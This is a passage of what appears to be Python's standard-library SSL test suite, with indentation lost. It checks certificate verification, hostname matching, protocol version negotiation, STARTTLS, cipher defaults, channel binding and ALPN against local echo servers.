cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
# VERIFY_CRL_CHECK_LEAF without a loaded CRL file fails
client_context.verify_flags |= ssl.VERIFY_CRL_CHECK_LEAF
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
with self.assertRaisesRegex(ssl.SSLError,
"certificate verify failed"):
s.connect((HOST, server.port))
# now load a CRL file. The CRL file is signed by the CA.
client_context.load_verify_locations(CRLFILE)
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
def test_check_hostname(self):
if support.verbose:
sys.stdout.write("\n")
client_context, server_context, hostname = testing_context()
# correct hostname should verify
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
# incorrect hostname should raise an exception
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname="invalid") as s:
with self.assertRaisesRegex(ssl.CertificateError,
"hostname 'invalid' doesn't match 'localhost'"):
s.connect((HOST, server.port))
# missing server_hostname arg should cause an exception, too
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with socket.socket() as s:
with self.assertRaisesRegex(ValueError,
"check_hostname requires server_hostname"):
client_context.wrap_socket(s)
def test_wrong_cert(self):
"""Connecting when the server rejects the client's certificate
Launch a server with CERT_REQUIRED, and check that trying to
connect to it with a wrong client certificate fails.
"""
certfile = os.path.join(os.path.dirname(__file__) or os.curdir,
"wrongcert.pem")
server = ThreadedEchoServer(CERTFILE,
certreqs=ssl.CERT_REQUIRED,
cacerts=CERTFILE, chatty=False,
connectionchatty=False)
with server, \
socket.socket() as sock, \
test_wrap_socket(sock, certfile=certfile) as s:
try:
# Expect either an SSL error about the server rejecting
# the connection, or a low-level connection reset (which
# sometimes happens on Windows)
s.connect((HOST, server.port))
except ssl.SSLError as e:
if support.verbose:
sys.stdout.write("\nSSLError is %r\n" % e)
except OSError as e:
if e.errno != errno.ECONNRESET:
raise
if support.verbose:
sys.stdout.write("\nsocket.error is %r\n" % e)
else:
self.fail("Use of invalid cert should have failed!")
def test_rude_shutdown(self):
"""A brutal shutdown of an SSL server should raise an OSError
in the client when attempting handshake.
"""
listener_ready = threading.Event()
listener_gone = threading.Event()
s = socket.socket()
port = support.bind_port(s, HOST)
# `listener` runs in a thread. It sits in an accept() until
# the main thread connects. Then it rudely closes the socket,
# and sets Event `listener_gone` to let the main thread know
# the socket is gone.
def listener():
s.listen()
listener_ready.set()
newsock, addr = s.accept()
newsock.close()
s.close()
listener_gone.set()
def connector():
listener_ready.wait()
with socket.socket() as c:
c.connect((HOST, port))
listener_gone.wait()
try:
ssl_sock = test_wrap_socket(c)
except OSError:
pass
else:
self.fail('connecting to closed SSL socket should have failed')
t = threading.Thread(target=listener)
t.start()
try:
connector()
finally:
t.join()
def test_ssl_cert_verify_error(self):
if support.verbose:
sys.stdout.write("\n")
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
server_context.load_cert_chain(SIGNED_CERTFILE)
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with context.wrap_socket(socket.socket(),
server_hostname=SIGNED_CERTFILE_HOSTNAME) as s:
try:
s.connect((HOST, server.port))
except ssl.SSLError as e:
msg = 'unable to get local issuer certificate'
self.assertIsInstance(e, ssl.SSLCertVerificationError)
self.assertEqual(e.verify_code, 20)
self.assertEqual(e.verify_message, msg)
self.assertIn(msg, repr(e))
self.assertIn('certificate verify failed', repr(e))
@skip_if_broken_ubuntu_ssl
@unittest.skipUnless(hasattr(ssl, 'PROTOCOL_SSLv2'),
"OpenSSL is compiled without SSLv2 support")
def test_protocol_sslv2(self):
"""Connecting to an SSLv2 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True, ssl.CERT_REQUIRED)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_TLS, False)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_TLSv1, False)
# SSLv23 client with specific SSL options
if no_sslv2_implies_sslv3_hello():
# No SSLv2 => client will use an SSLv3 hello on recent OpenSSLs
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_SSLv2)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_SSLv3)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_TLSv1)
@skip_if_broken_ubuntu_ssl
def test_PROTOCOL_TLS(self):
"""Connecting to an SSLv23 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try:
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_SSLv2, True)
except OSError as x:
# this fails on some older versions of OpenSSL (0.9.7l, for instance)
if support.verbose:
sys.stdout.write(
" SSL2 client to SSL23 server test unexpectedly failed:\n %s\n"
% str(x))
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLS, True)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLSv1, 'TLSv1')
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_SSLv3, False, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLS, True, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_OPTIONAL)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_SSLv3, False, ssl.CERT_REQUIRED)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLS, True, ssl.CERT_REQUIRED)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_REQUIRED)
# Server with specific SSL options
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_SSLv3, False,
server_options=ssl.OP_NO_SSLv3)
# Will choose TLSv1
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLS, True,
server_options=ssl.OP_NO_SSLv2 | ssl.OP_NO_SSLv3)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLSv1, False,
server_options=ssl.OP_NO_TLSv1)
@skip_if_broken_ubuntu_ssl
@unittest.skipUnless(hasattr(ssl, 'PROTOCOL_SSLv3'),
"OpenSSL is compiled without SSLv3 support")
def test_protocol_sslv3(self):
"""Connecting to an SSLv3 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, 'SSLv3')
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, 'SSLv3', ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, 'SSLv3', ssl.CERT_REQUIRED)
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv2, False)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_SSLv3)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_TLSv1, False)
if no_sslv2_implies_sslv3_hello():
# No SSLv2 => client will use an SSLv3 hello on recent OpenSSLs
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_TLS,
False, client_options=ssl.OP_NO_SSLv2)
@skip_if_broken_ubuntu_ssl
def test_protocol_tlsv1(self):
"""Connecting to a TLSv1 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, 'TLSv1')
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_REQUIRED)
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_SSLv2, False)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_TLSv1)
@skip_if_broken_ubuntu_ssl
@unittest.skipUnless(hasattr(ssl, "PROTOCOL_TLSv1_1"),
"TLS version 1.1 not supported.")
def test_protocol_tlsv1_1(self):
"""Connecting to a TLSv1.1 server with various client options.
Testing against older TLS versions."""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1_1, 'TLSv1.1')
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_SSLv2, False)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_TLSv1_1)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLSv1_1, 'TLSv1.1')
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1_1, False)
@skip_if_broken_ubuntu_ssl
@unittest.skipUnless(hasattr(ssl, "PROTOCOL_TLSv1_2"),
"TLS version 1.2 not supported.")
def test_protocol_tlsv1_2(self):
"""Connecting to a TLSv1.2 server with various client options.
Testing against older TLS versions."""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1_2, 'TLSv1.2',
server_options=ssl.OP_NO_SSLv3|ssl.OP_NO_SSLv2,
client_options=ssl.OP_NO_SSLv3|ssl.OP_NO_SSLv2,)
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_SSLv2, False)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_TLSv1_2)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLSv1_2, 'TLSv1.2')
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1_2, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1_1, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1_2, False)
def test_starttls(self):
"""Switching from clear text to encrypted and back again."""
msgs = (b"msg 1", b"MSG 2", b"STARTTLS", b"MSG 3", b"msg 4", b"ENDTLS", b"msg 5", b"msg 6")
server = ThreadedEchoServer(CERTFILE,
starttls_server=True,
chatty=True,
connectionchatty=True)
wrapped = False
with server:
s = socket.socket()
s.setblocking(1)
s.connect((HOST, server.port))
if support.verbose:
sys.stdout.write("\n")
for indata in msgs:
if support.verbose:
sys.stdout.write(
" client: sending %r...\n" % indata)
if wrapped:
conn.write(indata)
outdata = conn.read()
else:
s.send(indata)
outdata = s.recv(1024)
msg = outdata.strip().lower()
if indata == b"STARTTLS" and msg.startswith(b"ok"):
# STARTTLS ok, switch to secure mode
if support.verbose:
sys.stdout.write(
" client: read %r from server, starting TLS...\n"
% msg)
conn = test_wrap_socket(s)
wrapped = True
elif indata == b"ENDTLS" and msg.startswith(b"ok"):
# ENDTLS ok, switch back to clear text
if support.verbose:
sys.stdout.write(
" client: read %r from server, ending TLS...\n"
% msg)
s = conn.unwrap()
wrapped = False
else:
if support.verbose:
sys.stdout.write(
" client: read %r from server\n" % msg)
if support.verbose:
sys.stdout.write(" client: closing connection.\n")
if wrapped:
conn.write(b"over\n")
else:
s.send(b"over\n")
if wrapped:
conn.close()
else:
s.close()
def test_socketserver(self):
"""Using socketserver to create and manage SSL connections."""
server = make_https_server(self, certfile=CERTFILE)
# try to connect
if support.verbose:
sys.stdout.write('\n')
with open(CERTFILE, 'rb') as f:
d1 = f.read()
d2 = ''
# now fetch the same data from the HTTPS server
url = 'https://localhost:%d/%s' % (
server.port, os.path.split(CERTFILE)[1])
context = ssl.create_default_context(cafile=CERTFILE)
f = urllib.request.urlopen(url, context=context)
try:
dlen = f.info().get("content-length")
if dlen and (int(dlen) > 0):
d2 = f.read(int(dlen))
if support.verbose:
sys.stdout.write(
" client: read %d bytes from remote server '%s'\n"
% (len(d2), server))
finally:
f.close()
self.assertEqual(d1, d2)
def test_asyncore_server(self):
"""Check the example asyncore integration."""
if support.verbose:
sys.stdout.write("\n")
indata = b"FOO\n"
server = AsyncoreEchoServer(CERTFILE)
with server:
s = test_wrap_socket(socket.socket())
s.connect(('127.0.0.1', server.port))
if support.verbose:
sys.stdout.write(
" client: sending %r...\n" % indata)
s.write(indata)
outdata = s.read()
if support.verbose:
sys.stdout.write(" client: read %r\n" % outdata)
if outdata != indata.lower():
self.fail(
"bad data <<%r>> (%d) received; expected <<%r>> (%d)\n"
% (outdata[:20], len(outdata),
indata[:20].lower(), len(indata)))
s.write(b"over\n")
if support.verbose:
sys.stdout.write(" client: closing connection.\n")
s.close()
if support.verbose:
sys.stdout.write(" client: connection closed.\n")
def test_recv_send(self):
"""Test recv(), send() and friends."""
if support.verbose:
sys.stdout.write("\n")
server = ThreadedEchoServer(CERTFILE,
certreqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLS_SERVER,
cacerts=CERTFILE,
chatty=True,
connectionchatty=False)
with server:
s = test_wrap_socket(socket.socket(),
server_side=False,
certfile=CERTFILE,
ca_certs=CERTFILE,
cert_reqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLS_CLIENT)
s.connect((HOST, server.port))
# helper methods for standardising recv* method signatures
def _recv_into():
b = bytearray(b"\0"*100)
count = s.recv_into(b)
return b[:count]
def _recvfrom_into():
b = bytearray(b"\0"*100)
count, addr = s.recvfrom_into(b)
return b[:count]
# (name, method, expect success?, *args, return value func)
send_methods = [
('send', s.send, True, [], len),
('sendto', s.sendto, False, ["some.address"], len),
('sendall', s.sendall, True, [], lambda x: None),
]
# (name, method, whether to expect success, *args)
recv_methods = [
('recv', s.recv, True, []),
('recvfrom', s.recvfrom, False, ["some.address"]),
('recv_into', _recv_into, True, []),
('recvfrom_into', _recvfrom_into, False, []),
]
data_prefix = "PREFIX_"
for (meth_name, send_meth, expect_success, args,
ret_val_meth) in send_methods:
indata = (data_prefix + meth_name).encode('ascii')
try:
ret = send_meth(indata, *args)
msg = "sending with {}".format(meth_name)
self.assertEqual(ret, ret_val_meth(indata), msg=msg)
outdata = s.read()
if outdata != indata.lower():
self.fail(
"While sending with <<{name:s}>> bad data "
"<<{outdata:r}>> ({nout:d}) received; "
"expected <<{indata:r}>> ({nin:d})\n".format(
name=meth_name, outdata=outdata[:20],
nout=len(outdata),
indata=indata[:20], nin=len(indata)
)
)
except ValueError as e:
if expect_success:
self.fail(
"Failed to send with method <<{name:s}>>; "
"expected to succeed.\n".format(name=meth_name)
)
if not str(e).startswith(meth_name):
self.fail(
"Method <<{name:s}>> failed with unexpected "
"exception message: {exp:s}\n".format(
name=meth_name, exp=e
)
)
for meth_name, recv_meth, expect_success, args in recv_methods:
indata = (data_prefix + meth_name).encode('ascii')
try:
s.send(indata)
outdata = recv_meth(*args)
if outdata != indata.lower():
self.fail(
"While receiving with <<{name:s}>> bad data "
"<<{outdata:r}>> ({nout:d}) received; "
"expected <<{indata:r}>> ({nin:d})\n".format(
name=meth_name, outdata=outdata[:20],
nout=len(outdata),
indata=indata[:20], nin=len(indata)
)
)
except ValueError as e:
if expect_success:
self.fail(
"Failed to receive with method <<{name:s}>>; "
"expected to succeed.\n".format(name=meth_name)
)
if not str(e).startswith(meth_name):
self.fail(
"Method <<{name:s}>> failed with unexpected "
"exception message: {exp:s}\n".format(
name=meth_name, exp=e
)
)
# consume data
s.read()
# read(-1, buffer) is supported, even though read(-1) is not
data = b"data"
s.send(data)
buffer = bytearray(len(data))
self.assertEqual(s.read(-1, buffer), len(data))
self.assertEqual(buffer, data)
# sendall accepts bytes-like objects
if ctypes is not None:
ubyte = ctypes.c_ubyte * len(data)
byteslike = ubyte.from_buffer_copy(data)
s.sendall(byteslike)
self.assertEqual(s.read(), data)
# Make sure sendmsg et al are disallowed to avoid
# inadvertent disclosure of data and/or corruption
# of the encrypted data stream
self.assertRaises(NotImplementedError, s.sendmsg, [b"data"])
self.assertRaises(NotImplementedError, s.recvmsg, 100)
self.assertRaises(NotImplementedError,
s.recvmsg_into, bytearray(100))
s.write(b"over\n")
self.assertRaises(ValueError, s.recv, -1)
self.assertRaises(ValueError, s.read, -1)
s.close()
def test_recv_zero(self):
server = ThreadedEchoServer(CERTFILE)
server.__enter__()
self.addCleanup(server.__exit__, None, None)
s = socket.create_connection((HOST, server.port))
self.addCleanup(s.close)
s = test_wrap_socket(s, suppress_ragged_eofs=False)
self.addCleanup(s.close)
# recv/read(0) should return no data
s.send(b"data")
self.assertEqual(s.recv(0), b"")
self.assertEqual(s.read(0), b"")
self.assertEqual(s.read(), b"data")
# Should not block if the other end sends no data
s.setblocking(False)
self.assertEqual(s.recv(0), b"")
self.assertEqual(s.recv_into(bytearray()), 0)
def test_nonblocking_send(self):
server = ThreadedEchoServer(CERTFILE,
certreqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLS_SERVER,
cacerts=CERTFILE,
chatty=True,
connectionchatty=False)
with server:
s = test_wrap_socket(socket.socket(),
server_side=False,
certfile=CERTFILE,
ca_certs=CERTFILE,
cert_reqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLS_CLIENT)
s.connect((HOST, server.port))
s.setblocking(False)
# If we keep sending data, at some point the buffers
# will be full and the call will block
buf = bytearray(8192)
def fill_buffer():
while True:
s.send(buf)
self.assertRaises((ssl.SSLWantWriteError,
ssl.SSLWantReadError), fill_buffer)
# Now read all the output and discard it
s.setblocking(True)
s.close()
def test_handshake_timeout(self):
# Issue #5103: SSL handshake must respect the socket timeout
server = socket.socket(socket.AF_INET)
host = "127.0.0.1"
port = support.bind_port(server)
started = threading.Event()
finish = False
def serve():
server.listen()
started.set()
conns = []
while not finish:
r, w, e = select.select([server], [], [], 0.1)
if server in r:
# Let the socket hang around rather than having
# it closed by garbage collection.
conns.append(server.accept()[0])
for sock in conns:
sock.close()
t = threading.Thread(target=serve)
t.start()
started.wait()
try:
try:
c = socket.socket(socket.AF_INET)
c.settimeout(0.2)
c.connect((host, port))
# Will attempt handshake and time out
self.assertRaisesRegex(socket.timeout, "timed out",
test_wrap_socket, c)
finally:
c.close()
try:
c = socket.socket(socket.AF_INET)
c = test_wrap_socket(c)
c.settimeout(0.2)
# Will attempt handshake and time out
self.assertRaisesRegex(socket.timeout, "timed out",
c.connect, (host, port))
finally:
c.close()
finally:
finish = True
t.join()
server.close()
def test_server_accept(self):
# Issue #16357: accept() on a SSLSocket created through
# SSLContext.wrap_socket().
context = ssl.SSLContext(ssl.PROTOCOL_TLS)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(CERTFILE)
context.load_cert_chain(CERTFILE)
server = socket.socket(socket.AF_INET)
host = "127.0.0.1"
port = support.bind_port(server)
server = context.wrap_socket(server, server_side=True)
self.assertTrue(server.server_side)
evt = threading.Event()
remote = None
peer = None
def serve():
nonlocal remote, peer
server.listen()
# Block on the accept and wait on the connection to close.
evt.set()
remote, peer = server.accept()
remote.recv(1)
t = threading.Thread(target=serve)
t.start()
        # Client waits until the server is set up, then performs a connect.
evt.wait()
client = context.wrap_socket(socket.socket())
client.connect((host, port))
client_addr = client.getsockname()
client.close()
t.join()
remote.close()
server.close()
# Sanity checks.
self.assertIsInstance(remote, ssl.SSLSocket)
self.assertEqual(peer, client_addr)
def test_getpeercert_enotconn(self):
context = ssl.SSLContext(ssl.PROTOCOL_TLS)
with context.wrap_socket(socket.socket()) as sock:
with self.assertRaises(OSError) as cm:
sock.getpeercert()
self.assertEqual(cm.exception.errno, errno.ENOTCONN)
def test_do_handshake_enotconn(self):
context = ssl.SSLContext(ssl.PROTOCOL_TLS)
with context.wrap_socket(socket.socket()) as sock:
with self.assertRaises(OSError) as cm:
sock.do_handshake()
self.assertEqual(cm.exception.errno, errno.ENOTCONN)
def test_default_ciphers(self):
context = ssl.SSLContext(ssl.PROTOCOL_TLS)
try:
# Force a set of weak ciphers on our client context
context.set_ciphers("DES")
except ssl.SSLError:
self.skipTest("no DES cipher available")
with ThreadedEchoServer(CERTFILE,
ssl_version=ssl.PROTOCOL_TLS,
chatty=False) as server:
with context.wrap_socket(socket.socket()) as s:
with self.assertRaises(OSError):
s.connect((HOST, server.port))
self.assertIn("no shared cipher", server.conn_errors[0])
def test_version_basic(self):
"""
Basic tests for SSLSocket.version().
More tests are done in the test_protocol_*() methods.
"""
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
context.check_hostname = False
context.verify_mode = ssl.CERT_NONE
with ThreadedEchoServer(CERTFILE,
ssl_version=ssl.PROTOCOL_TLS_SERVER,
chatty=False) as server:
with context.wrap_socket(socket.socket()) as s:
self.assertIs(s.version(), None)
s.connect((HOST, server.port))
if ssl.OPENSSL_VERSION_INFO >= (1, 0, 2):
self.assertEqual(s.version(), 'TLSv1.2')
else: # 0.9.8 to 1.0.1
self.assertIn(s.version(), ('TLSv1', 'TLSv1.2'))
self.assertIs(s.version(), None)
@unittest.skipUnless(ssl.HAS_TLSv1_3,
"test requires TLSv1.3 enabled OpenSSL")
def test_tls1_3(self):
context = ssl.SSLContext(ssl.PROTOCOL_TLS)
context.load_cert_chain(CERTFILE)
# disable all but TLS 1.3
context.options |= (
ssl.OP_NO_TLSv1 | ssl.OP_NO_TLSv1_1 | ssl.OP_NO_TLSv1_2
)
with ThreadedEchoServer(context=context) as server:
with context.wrap_socket(socket.socket()) as s:
s.connect((HOST, server.port))
self.assertIn(s.cipher()[0], [
'TLS13-AES-256-GCM-SHA384',
'TLS13-CHACHA20-POLY1305-SHA256',
'TLS13-AES-128-GCM-SHA256',
])
@unittest.skipUnless(ssl.HAS_ECDH, "test requires ECDH-enabled OpenSSL")
def test_default_ecdh_curve(self):
# Issue #21015: elliptic curve-based Diffie Hellman key exchange
# should be enabled by default on SSL contexts.
context = ssl.SSLContext(ssl.PROTOCOL_TLS)
context.load_cert_chain(CERTFILE)
# TLSv1.3 defaults to PFS key agreement and no longer has KEA in
# cipher name.
context.options |= ssl.OP_NO_TLSv1_3
# Prior to OpenSSL 1.0.0, ECDH ciphers have to be enabled
# explicitly using the 'ECCdraft' cipher alias. Otherwise,
# our default cipher list should prefer ECDH-based ciphers
# automatically.
if ssl.OPENSSL_VERSION_INFO < (1, 0, 0):
context.set_ciphers("ECCdraft:ECDH")
with ThreadedEchoServer(context=context) as server:
with context.wrap_socket(socket.socket()) as s:
s.connect((HOST, server.port))
self.assertIn("ECDH", s.cipher()[0])
@unittest.skipUnless("tls-unique" in ssl.CHANNEL_BINDING_TYPES,
"'tls-unique' channel binding not available")
def test_tls_unique_channel_binding(self):
"""Test tls-unique channel binding."""
if support.verbose:
sys.stdout.write("\n")
server = ThreadedEchoServer(CERTFILE,
certreqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLS_SERVER,
cacerts=CERTFILE,
chatty=True,
connectionchatty=False)
with server:
s = test_wrap_socket(socket.socket(),
server_side=False,
certfile=CERTFILE,
ca_certs=CERTFILE,
cert_reqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLS_CLIENT)
s.connect((HOST, server.port))
# get the data
cb_data = s.get_channel_binding("tls-unique")
if support.verbose:
sys.stdout.write(" got channel binding data: {0!r}\n"
.format(cb_data))
# check if it is sane
self.assertIsNotNone(cb_data)
self.assertEqual(len(cb_data), 12) # True for TLSv1
# and compare with the peers version
s.write(b"CB tls-unique\n")
peer_data_repr = s.read().strip()
self.assertEqual(peer_data_repr,
repr(cb_data).encode("us-ascii"))
s.close()
# now, again
s = test_wrap_socket(socket.socket(),
server_side=False,
certfile=CERTFILE,
ca_certs=CERTFILE,
cert_reqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLS_CLIENT)
s.connect((HOST, server.port))
new_cb_data = s.get_channel_binding("tls-unique")
if support.verbose:
sys.stdout.write(" got another channel binding data: {0!r}\n"
.format(new_cb_data))
# is it really unique
self.assertNotEqual(cb_data, new_cb_data)
self.assertIsNotNone(cb_data)
self.assertEqual(len(cb_data), 12) # True for TLSv1
s.write(b"CB tls-unique\n")
peer_data_repr = s.read().strip()
self.assertEqual(peer_data_repr,
repr(new_cb_data).encode("us-ascii"))
s.close()
def test_compression(self):
client_context, server_context, hostname = testing_context()
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
if support.verbose:
sys.stdout.write(" got compression: {!r}\n".format(stats['compression']))
self.assertIn(stats['compression'], { None, 'ZLIB', 'RLE' })
@unittest.skipUnless(hasattr(ssl, 'OP_NO_COMPRESSION'),
"ssl.OP_NO_COMPRESSION needed for this test")
def test_compression_disabled(self):
client_context, server_context, hostname = testing_context()
client_context.options |= ssl.OP_NO_COMPRESSION
server_context.options |= ssl.OP_NO_COMPRESSION
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
self.assertIs(stats['compression'], None)
def test_dh_params(self):
# Check we can get a connection with ephemeral Diffie-Hellman
client_context, server_context, hostname = testing_context()
server_context.load_dh_params(DHFILE)
server_context.set_ciphers("kEDH")
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
cipher = stats["cipher"][0]
parts = cipher.split("-")
if "ADH" not in parts and "EDH" not in parts and "DHE" not in parts:
self.fail("Non-DH cipher: " + cipher[0])
def test_selected_alpn_protocol(self):
# selected_alpn_protocol() is None unless ALPN is used.
client_context, server_context, hostname = testing_context()
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
self.assertIs(stats['client_alpn_protocol'], None)
@unittest.skipUnless(ssl.HAS_ALPN, "ALPN support required")
def test_selected_alpn_protocol_if_server_uses_alpn(self):
# selected_alpn_protocol() is None unless ALPN is used by the client.
client_context, server_context, hostname = testing_context()
server_context.set_alpn_protocols(['foo', 'bar'])
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
self.assertIs(stats['client_alpn_protocol'], None)
@unittest.skipUnless(ssl.HAS_ALPN, "ALPN support needed for this test")
def test_alpn_protocols(self):
server_protocols = ['foo', 'bar', 'milkshake']
protocol_tests = [
(['foo', 'bar'], 'foo'),
(['bar', 'foo'], 'foo'),
(['milkshake'], 'milkshake'),
(['http/3.0', 'http/4.0'], None)
]
for client_protocols, expected in protocol_tests:
client_context, server_context, hostname = testing_context()
server_context.set_alpn_protocols(server_protocols)
client_context.set_alpn_protocols(client_protocols)
try:
stats = server_params_test(client_context,
server_context,
chatty=True,
connectionchatty=True,
sni_name=hostname)
except ssl.SSLError as e:
stats = e
if (expected is None and IS_OPENSSL_1_1
and ssl.OPENSSL_VERSION_INFO < (1, 1, 0, 6)):
# OpenSSL 1.1.0 to 1.1.0e raises handshake error
self.assertIsInstance(stats, ssl.SSLError)
else:
msg = "failed trying %s (s) and %s (c).\n" \
"was expecting %s, but got %%s from the %%s" \
% (str(server_protocols), str(client_protocols),
str(expected))
client_result = stats['client_alpn_protocol']
self.assertEqual(client_result, expected,
msg % (client_result, "client"))
server_result = stats['server_alpn_protocols'][-1] \
if len(stats['server_alpn_protocols']) else 'nothing'
self.assertEqual(server_result, expected,
msg % (server_result, "server"))
def test_selected_npn_protocol(self):
# selected_npn_protocol() is None unless NPN is used
